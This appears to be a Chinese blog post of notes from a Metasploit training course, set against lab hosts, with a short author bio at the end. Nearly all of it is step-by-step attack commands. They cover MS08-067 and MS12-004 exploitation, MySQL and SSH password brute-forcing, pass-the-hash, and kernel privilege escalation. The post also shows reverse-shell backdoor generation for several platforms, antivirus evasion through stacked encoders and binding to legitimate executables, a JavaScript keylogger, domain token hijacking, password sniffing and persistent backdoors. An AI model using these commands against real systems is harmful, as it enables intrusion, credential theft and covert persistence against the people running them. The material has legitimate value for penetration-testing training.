分类
CTF

i春秋 羽翼Metasploit系列教程第二季

  ### 课时1 Metasploit之远程代码执行
 漏洞:ms08067
 靶机:xp sp2
 
     msf > search 08-067
     msf > use exploit/windows/smb/ms08-067_netapi 
 
     msf > show options
     msf > set RHOST 192.168.0.6
     msf > show options
 
     msf > show payloads  //设置载荷,反弹回shell
     msf > set payload windows/meterpreter/reverse_tcp
     msf > show option
 
     msf > set LHOST 127.0.0.1  //对载荷设置
     msf > show options
     msf > info //查看信息,影响的版本,第一种
     msf > nmap -O 192.168.0.6  //扫描主机,查看版本
     msf > show targets  //第二种方法
     msf > set target 17  //影响的版本,对应的序号;
     //只有08-067不识别版本号
     msf > show options
 
     msf > exploit  //执行攻击
     
     msf > shell  //反弹后获取shell    
     cmd > whoami
     cmd > net user admin admin /add  //添加用户
     cmd > net user  //查看用户 
     cmd > net user admin /del  //删除用户
 
 ### 课时2 Metasploit之MIDI文件解析远程代码执行
 
 windows xp 靶机
 
     msf > search 12-004
     msf > use exploit/windows/browser/ms12_004_midi 
     msf > show options
     msf > set SRVHOST 127.0.0.1     
     msf > exploit  //生成
     msf > set URLPATH /  //设置路径
     msf > exploit 
     鱼点击链接后,在岸上有个会话,但不会直接显示;需要查看
     msf > sessions -i 1  //会话的id为1
     msf > shell
     cmd > ipconfig
 
 ### 课时3 Metasploit之口令安全
 
 弱口令问题
 
 - 存在的"隐患"
 
 - 如何用msf去检测
 
 > 先启动mysql
 
     msf > search mysql_login
     msf > use auxiliary/scanner/mysql/mysql_login
     msf > show options 
     msf > set RHOSTS 192.168.0.6
     msf > set USERNAME root  //可以指定文件作为用户名字典
     msf > set PASS_FILE /root/1.txt
     msf > set THREADS 50
     msf > exploit //进行攻击,破解成功立即终止
     
     msf > search ssh_login
     msf > use auxiliary/scanner/ssh/ssh_login
     msf > show options 
     msf > set RHOSTS 192.168.0.6
     msf > set USERNAME root
     msf > set PASS_FILE /root/1.txt
     msf > set THREADS 50
     msf > exploit
 
 ### 课时4 Metasploit之Hash值传递渗透
 
 1. 不知道密码的情况下
 
     获取shell之后,使用
     `m > hashdump`
 
 2. 知道密码,直接登录
 >
     msf > use exploit/windows/smb/psexec
     msf > show options
     
     一
     msf > set RHOST 192.168.0.6
     msf > set SMBUSER wing //用户名
     msf > exploit
     m > hashdump 
 
     二    获取hash值后可以登陆
     msf > set smbpass HashValue  //设置密码Hash可以直接登录
     msf > exploit
 
 ### 课时5 Metasploit之NDProxy内核提权
     提权的前提是必须有一个会话
     
     编号?
     msf > search 14-002
     msf > use exploit/windows/local/ms_ndproxy  //提升权限 ,点击pdf触发
     msf > show options
     msf > set session 1
     msf > exploit
     m    > getuid  //查看权限
     m     > getsystem
 
 ### 课时6 Metasploit之多种后门生成
 
 - Windows后门
 - Linux后门
 - Java后门
 - Php后门
 - Jsp后门
 - Asp后门
 - Aspx后门
 - Android后门
 
     `msf > show payloads //查看载荷`
 
 - **Windows 后门生成**
 >
     root@shuoed:~# msfpayload windows/meterpreter/reverse_tcp  LHOST = 127.0.0.1 LRORT=123 x >/root/123.exe  //调用windows载荷,生成windows后门;再放置到目标机
 >    
     msf > search handler  //设置监听程序,接受反弹的shell
     msf > use exploit/multi/handler
     msf > show options  //查看需要设置什么选项
     msf > set payload windows/meterpreter/reverse_tcp  //设置payload
     msf > show options 
     msf > set LHOST 127.0.0.1
     msf > set LPORT 123
     msf > exploit  //开始监听
     
     win > 运行123.exe程序
     
     msf反弹回shell
     m     > 
 
 - **Linux后门生成**
 >
     root@shuoed:~# msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=321 x>/root/linuxM //调用linux载荷,生成linux木马后门;再放置到目标机
 
     生成的木马在当前目录下
 
     root@shuoed:~# chmod 777 /root/linuxM  //赋予权限
 
 也生可成一个dll文件
 
 - **生成一个java后门**
 >
     root@shuoed:~# msfpayload java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1111 w>123.jar
 
 - **生成一个php后门**
 >
     root@shuoed:~# msfpayload php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=222 R | msfencode -e php/base64 -t raw -o 123.php
 
 上传该文件到网站,访问该文件;
 在127机设置监听,即可反弹shell
 
 - **生成Android后门**
 >
     root@shuoed:~# msfpayload android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=333 R >1.apk
     
 ### 课时7 Metasploit之内网渗透
 
     获得shell,需要对C端进行一次扫描
     m    > run get_local_subnets  //获得网卡信息 
     192.168.6.0/255.255.254.0
     m    > run autoroute -s 192.168.6.0/24  //扫描C段
     m    > run autoroute -P
 
 - 存在域环境
 >
 //  查看域环境,显示域环境
 `cmd > net view`
     
     //  域渗透,在msf中劫持域管理
      m    > use incognito  //调用模块
     m    > list_tokens -u //查看域
     
     // 发现域管理 ADMIN-66DDA0F56\Zadmin
     m    > impersonate_token ADMIN-66DDA0F56\Zadmin
     //  劫持成功后    
     m    > shell
     cmd > 
 - 没有域环境
 >
     msf > use auxiliary/sniffer/psunffle //调用模块
     msf > run  //嗅探密码
     
     win端操作,例如ftp服务器,进行FTP访问
     滚屏显示,成功捕获到的密码
     查看是否可以嗅探到http的访问信息
 
 ### 课时8 Metasploit之反反病毒(免杀)
     
 1. 归纳一下免杀的例子
 - 加壳、改壳、加花指令->无特征码免杀
 - 有特征码(找到特征码的位置)、汇编、源码改掉
 - 手动免杀比Metasploit效果好
 2. Metasploit是如何做的
 编码的方式,对文件进行免杀;企业版效果好,免费版烂。
 
 免杀方法:
 
     root@shuoed:~# msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R | msfencode -e x86/shikata_ga_nai -t exe >123.exe  //一次免杀编码,效果不好
 
     www.virscan.org  //世界杀毒网进行检测
 
     查看有哪些编码可以供使用:
     root@shuoed:~# msfencode -l
 
     编码可以重复、组合使用
     root@shuoed:~# msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R | msfencode -e x86/shikata_ga_nai -c 10 -t raw | masfencode -e x86/countdown -c 6 -t exe -o /1231.exe    
 
 绑定一个正常的文件
 
     root@shuoed:~# msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R | msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai -k -c 10
 
 加壳
 >    root@shuoed:~# upx -5 /1231.exe
 
 ### 课时9 Metasploit之玩转不一样的xss
     
     msf > search keylogger
     msf > use auxiliary/server/capture/http_javascript_keylogger
     msf > show options
     msf > set DEMO true
     msf > set URIPATH /
     msf > set srvport 80
     msf > run  //即可生成一个url
 
 ### 课时10 Metasploit之维持访问(后门)
     前提是要有一个会话;溢出攻击、ssh等;
     shellcode连接主机
     msf > use exploit/multi/handler
     msf > set payload windows/meterpreter/reverse_tcp
     msf > show option
     msf > set LHOST 127.0.0.1
     msf > set LPORT 1111
     msf > run 
     
     靶机运行程序
     
     即可获得反弹的会话
     m    > run metsvc -A  //设置后门
 
 
     一段时间后再次访问该肉鸡
     msf > use exploit/multi/handler  //同样的模块;不同的载荷
     msf > set payload windows/metsvc_bind_tcp
     msf > show options
     msf > set LPORT 31337  //设置后门时显示的端口
     msf > set RHOST 192.168.0.6  //对方的地址
     msf > exploit
     m    > ps
     m    > getuid
 
     第二种方法,通过键盘记录
     查看有哪些用户    cmd > net user
     
     m    > keyscan_start
     m   >keyscan_dump  //查看记录
     
     //上传程序
     m    > shell
     cmd > 

shuoed

山东鄄城人士,大学本科读了计算机科学与技术专业,研究生期间读了诉讼法学专业。
计算机领域,算法方面是算是ACM省银水平;编程方面在高校取得过项目比赛的奖励;网络方面考过了计算机等级四级网络工程师;安全方面考过了软考信息安全工程师;学术方面发表了一篇关于密码设置的论文,毕业论文写了X86架构下微内核的设计与实现。
法律领域,学术方面发表了三篇分别关于身份同一认定、不损坏原件原则、跨境取证的论文,写了一篇关于DDoS黑产的硕士论文(投稿中);取证方面参见了三类电子取证比赛,虎鲸杯、中科实数杯、美亚杯等共6次比赛,5次获奖。
目前就职于国内某知名电子取证公司做培训讲师。

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注